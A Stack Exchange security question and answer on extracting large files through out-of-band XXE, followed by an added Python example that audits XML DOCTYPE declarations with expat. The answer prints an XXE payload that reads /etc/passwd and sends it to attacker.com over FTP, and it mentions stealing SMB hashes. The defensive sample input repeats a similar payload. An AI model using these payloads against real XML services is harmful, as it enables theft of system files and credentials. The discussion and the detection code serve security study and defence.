5

Most examples of extracting files through XXE OOB (Out of Band) set up a listening HTTP server and listen for incoming requests on the URL requested. However, since the URL length is limited to something like 2048, how would you extract larger files through this method, or other OOB methods? Is it possible to perform a POST request through XXE OOB?

Ravan87
  • Hello and welcome to Stack Exchange. That's a fantastic first question! –  Aug 12 '19 at 12:46
  • Curious if `206 Partial Content` would make the vulnerable application send another request. It might also be possible to make the application throw an error and retrieve the file content using one of the local DTDs, as in https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/ – 1lastBr3ath Dec 29 '19 at 03:26

1 Answer

0

That's a really interesting question, and one that is often overlooked when discussing XXE, where the typical PoC is exfiltrating the /etc/passwd file. According to one source, "Very Large files such as /dev/random and /dev/zero either can’t be retrieved or lead to Denial of Service. This is DoS via XXE." So I think the short answer is that, since there isn't any logic or script that exists to break up the requests, it's not possible to send a large file over an HTTP GET request without issues. However, it seems like if you are willing to look at some other protocols, you can exfiltrate larger files using FTP.

Instead of making an HTTP request, you could always try making an FTP request with an example like the following:

```xml
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'ftp://attacker.com:2222/?data=%data;'>">
```

Then, assuming that you have a listening FTP server, you can pull the data out that way. (More information about this method can be found here) The listed guide also explains how you can steal hashes using the SMB protocol too with Responder. Of course, the big drawback of working with other protocols is trying to get those other ports past the firewall, as HTTP and even DNS are typically allowed, which makes them ideal.

Tobin Shields
  • Considering that neither /dev/random nor /dev/zero are "very large" or, in the most common sense, "files", I'm a little skeptical of that source. You certainly can get DoS by making the application try to read an infinite stream (of random bytes or zeros) - though in practice /dev/random usually limits reads to a fairly short length - but there's absolutely no point in trying to exfiltrate or process the retrieved data, so it doesn't indicate much about whether or not XXE could do so. Also, as with all XML exploits, exact behavior depends on the server-side XML library. – CBHacking Apr 29 '21 at 22:59
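
From the defending side, the thread's two points (the exfiltration channel can be `ftp` as well as `http`, and behaviour depends on the XML library) argue for inspecting the DOCTYPE before the document reaches the application's parser. The following is an added example, not code from the question or the answer: it uses Python's expat bindings to list external identifiers without resolving them. The function names, the reject-any-DOCTYPE policy and the `collector.example` host are assumptions made for illustration.

```python
# Added example (not from the original thread): audit untrusted XML for
# DOCTYPE/entity declarations before it reaches the application's parser.
from urllib.parse import urlsplit
from xml.parsers import expat


def audit_doctype(xml_bytes):
    """Return [(kind, name, scheme, system_id)] for the DOCTYPE and every
    entity declared with an external identifier. Nothing is fetched: no
    ExternalEntityRefHandler is set and parameter-entity parsing stays off."""
    findings = []

    def scheme_of(system_id):
        return urlsplit(system_id).scheme.lower() or "relative"

    def on_doctype(name, system_id, public_id, has_internal_subset):
        scheme = scheme_of(system_id) if system_id else None
        findings.append(("doctype", name, scheme, system_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:  # declared with SYSTEM or PUBLIC
            kind = "parameter-entity" if is_param else "general-entity"
            findings.append((kind, name, scheme_of(system_id), system_id))

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(xml_bytes, True)
    except expat.ExpatError:
        pass  # malformed input: keep whatever was seen before the error
    return findings


def should_reject(xml_bytes):
    # expat stops reporting declarations after a parameter-entity reference it
    # does not expand, so the decision is "any DOCTYPE at all"; the per-entity
    # findings are for logging which schemes (file, ftp, http) were requested.
    return bool(audit_doctype(xml_bytes))


# Constructed sample input; collector.example is a placeholder host.
SAMPLE = b"""<?xml version="1.0"?>
<!DOCTYPE order [
  <!ENTITY % data SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "ftp://collector.example:2222/ext.dtd">
  %dtd;
]>
<order><id>1</id></order>"""
```

The findings are meant for alerting; the parser that actually processes the document should still have DTD loading and external entity resolution disabled.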